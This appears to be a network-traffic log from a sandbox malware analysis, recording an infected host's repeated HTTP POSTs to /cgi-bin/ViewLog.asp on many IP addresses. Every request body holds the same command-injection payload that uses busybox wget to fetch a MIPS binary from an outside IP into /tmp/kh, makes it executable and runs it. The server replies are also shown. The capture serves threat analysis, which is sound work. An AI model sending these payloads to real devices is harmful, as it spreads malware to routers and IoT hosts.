                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 36 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.56 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.56</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              42192.168.2.134585094.110.0.728080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.346093893 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:11.942673922 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              43192.168.2.134053094.122.207.2188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.362509012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              44192.168.2.135097494.120.167.2038080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.365878105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              45192.168.2.133558494.158.46.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.370811939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              46192.168.2.133751431.173.224.2128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.525836945 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              47192.168.2.135286894.120.255.1748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.550267935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              48192.168.2.135688462.173.186.668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.744612932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:11.938976049 CET407INHTTP/1.0 302 Found
                                              Cache-Control: no-cache, no-store, must-revalidate
                                              Pragma: no-cache
                                              Location: https://192.168.0.14:4443/cgi-bin/ViewLog.asp
                                              Content-type: text/html
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 33 30 32 20 44 6f 63 75 6d 65 6e 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 31 39 32 2e 31 36 38 2e 30 2e 31 34 3a 34 34 34 33 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html> <head> <title>302 Document moved</title> </head><body>This document has moved <A HREF="https://192.168.0.14:4443/cgi-bin/ViewLog.asp">here</A>.<P></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              49192.168.2.133402062.202.158.2368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.749609947 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              50192.168.2.134161885.185.170.2518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.832087040 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:12.105884075 CET556INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Thu, 23 Nov 2023 04:15:11 GMT
                                              Connection: close
                                              Content-Length: 311
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              51192.168.2.134217094.120.244.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:13.859556913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              52192.168.2.135758462.31.252.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.072432041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:14.286953926 CET1257INHTTP/1.1 307 Temporary Redirect
                                              Date: Thu, 23 Nov 2023 04:15:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 152
                                              Connection: close
                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              53192.168.2.134463694.187.117.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.079641104 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              54192.168.2.134384631.200.7.08080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.082046986 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              55192.168.2.133978294.122.27.2308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.082372904 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              56192.168.2.134792262.202.158.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:17.546838999 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
